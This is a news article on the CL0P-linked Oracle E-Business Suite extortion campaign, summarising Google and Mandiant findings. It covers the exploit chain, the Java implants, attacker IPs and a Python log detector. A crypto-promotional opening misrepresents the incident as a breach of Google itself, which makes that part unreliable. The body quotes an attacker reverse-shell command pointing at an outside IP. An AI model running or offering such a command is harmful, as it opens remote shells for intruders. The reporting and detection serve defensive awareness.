Google Reveals Mass Customer Data Hit by Extortion Attack: Another Wake-Up Call for Crypto Asset Security


Published: 2025-10-10 00:53:59

Google reports 'mass amounts of customer data' exploited in extortion campaign

Tech Giant Caught in a Data Crisis

When even a traditional internet giant's basic data protection is riddled with holes, the value proposition of decentralized finance is being reappraised: on the blockchain, after all, your private key belongs to you alone.

Security Defenses Collapse Across the Board

The attackers not only broke through Google's layered security defenses but also obtained "mass amounts of customer data" sufficient for extortion. It recalls the year-after-year data breach scandals of traditional financial institutions, except that this time it is a tech giant that stumbled in security class.

How the Crypto World Answers

While centralized storage has become a cash machine for hackers, distributed ledger technology is rebuilding the trust model on mathematical proof. The transparent execution of smart contracts and the self-custody of non-custodial wallets silently mock the obsolescence and fragility of the traditional data-management model.

The Future of Financial Security

This incident proves once again that in the digital age, entrusting your fate to a third-party custodian is like building a castle on quicksand. Perhaps the traditional finance figures who still question the security of cryptocurrency should look at their own backyard first: if even Google can be breached, what centralized database dares call itself absolutely secure?

Google and Mandiant reveal zero-day exploitation 

According to Google’s report, the attackers sent a “high volume” of emails to executives across multiple organizations, alleging breaches of their Oracle EBS environments and threatening to publish stolen data unless a ransom was paid. 

The emails, sent from hundreds of compromised third-party accounts, included contact addresses, [email protected] and [email protected], previously linked to the CL0P data leak site.

Google and Mandiant’s joint investigation found that the exploitation activity dates back to as early as July 2025, possibly linked to a zero-day vulnerability now tracked as CVE-2025-61882. In some cases, the attackers reportedly exfiltrated “a significant amount of data” from affected organizations.

Oracle stated that the exploited flaws had been fixed in July, but later issued emergency updates on October 4 to address additional vulnerabilities. Oracle told its customers to use the latest critical patch updates and stressed that staying current on all patches is essential to prevent compromise.

The CL0P extortion brand has been active since 2020 and is historically tied to the FIN11 cybercrime group. It has previously targeted managed file transfer systems like MOVEit, GoAnywhere, and Accellion FTA. Those campaigns followed a similar pattern of the mass exploitation of zero-day vulnerabilities, theft of sensitive data, and extortion weeks later. 

At the time of the report, no new victims from this incident had appeared on CL0P’s data leak site. 

Complex, multi-stage Java implants

Google and Mandiant’s technical breakdown reveals that the attackers used multiple exploit chains targeting Oracle EBS components, including UiServlet and SyncServlet, to achieve remote code execution and plant multi-stage Java implants.

The suspicious activity seen in July 2025 involved HTTP requests to /OA_HTML/configurator/UiServlet. The same activity matched an exploit that later surfaced in a Telegram group named "SCATTERED LAPSUS$ HUNTERS."

The leaked exploit chained several techniques to gain control of targeted servers: a server-side request forgery (SSRF), an authentication bypass, and an XSL template injection.

By August 2025, the attackers had moved to another EBS component, SyncServlet, to create and execute malicious templates stored in the EBS database. These templates contained Base64-encoded XSL payloads that loaded Java-based malware directly into memory.

Among the identified implants were GOLDVEIN.JAVA, a downloader that retrieved second-stage payloads from attacker-controlled command servers, and a multi-layered chain dubbed SAGE, which installed persistent Java servlet filters for further exploitation.

After breaching the system, the attackers used the EBS account "applmgr" to perform reconnaissance, collect network and system details, and then install more malicious files. The attackers also ran shell commands such as ip addr, netstat -an, and bash -i >& /dev/tcp/200.107.207.26/53 0>&1.

The IP addresses 200.107.207.26 and 161.97.99.49 were identified in exploitation attempts, while 162.55.17.215:443 and 104.194.11.200:443 were listed as command-and-control servers for the GOLDVEIN.JAVA payload.

GTIG has not formally linked the operation to any known group, but the campaign shares similarities with FIN11, which is a financially motivated cybercrime group that was previously associated with CL0P ransomware and large-scale data theft operations. 

Mandiant also noted that one of the compromised accounts used to send the extortion emails had been used in earlier FIN11-related attacks.

Users are urged to review the EBS database tables XDO_TEMPLATES_B and XDO_LOBS for suspicious entries, especially those whose names begin with "TMP" or "DEF", and to block outbound internet traffic from EBS servers to prevent further data theft and extortion.

The organizations also recommend close monitoring of HTTP requests to endpoints like /OA_HTML/SyncServlet and /OA_HTML/configurator/UiServlet, and analyzing memory dumps for evidence of in-memory Java payloads.
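The monitoring recommendation above, as an added example that is not part of the original article or of Google's or Mandiant's tooling: a small detector that reads web-tier access-log lines, flags requests to the two EBS servlets named in the report, marks those coming from outside the organisation, and tags sources that match the exploitation IPs quoted on this page. The internal ranges, the Common Log Format assumption and the sample lines are assumptions made for the example.

```python
import re
from ipaddress import ip_address, ip_network

# Endpoints and source addresses quoted on this page from the Google/Mandiant findings.
WATCHED_PATHS = ("/OA_HTML/SyncServlet", "/OA_HTML/configurator/UiServlet")
EXPLOIT_SOURCE_IPS = {"200.107.207.26", "161.97.99.49"}

# Assumption: the organisation's own address space; replace with the real ranges.
INTERNAL_NETS = [ip_network("10.0.0.0/8"), ip_network("192.168.0.0/16")]

# Assumption: the EBS web tier writes Common Log Format access lines.
LOG_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')

def is_internal(addr):
    try:
        ip = ip_address(addr)
    except ValueError:
        return False
    return any(ip in net for net in INTERNAL_NETS)

def classify_request(line):
    """Findings for one access-log line; an empty list means nothing to flag."""
    m = LOG_RE.match(line)
    if not m:
        return []
    findings = []
    path = m.group("path").split("?", 1)[0]  # drop the query string before matching
    if any(path.startswith(p) for p in WATCHED_PATHS):
        findings.append("watched-endpoint:" + path)
        # These servlets were reached from the internet in the campaign, so an
        # external source is worth a look whatever the response status was.
        if not is_internal(m.group("src")):
            findings.append("external-source")
    if m.group("src") in EXPLOIT_SOURCE_IPS:
        findings.append("known-exploit-ip")
    return findings

def scan_log(lines):
    """Map line index -> findings for every line that produced any."""
    return {i: f for i, f in enumerate(map(classify_request, lines)) if f}

# Constructed sample lines, not real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Aug/2025:10:15:01 +0000] "GET /OA_HTML/AppsLogin HTTP/1.1" 200 512',
    '200.107.207.26 - - [12/Aug/2025:10:16:33 +0000] "POST /OA_HTML/configurator/UiServlet HTTP/1.1" 200 88',
    '203.0.113.7 - - [12/Aug/2025:10:17:02 +0000] "POST /OA_HTML/SyncServlet?x=1 HTTP/1.1" 500 0',
    '10.0.0.9 - - [12/Aug/2025:10:18:40 +0000] "GET /OA_HTML/SyncServlet HTTP/1.1" 200 10',
]
```

Calling scan_log(SAMPLE_LOG) flags lines 1, 2 and 3; the internal hit on line 3 is reported as well, because an internal source does not rule out an already-compromised host.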

Google warned that CL0P-linked groups will almost certainly continue to dedicate their resources to acquiring zero-day exploits.
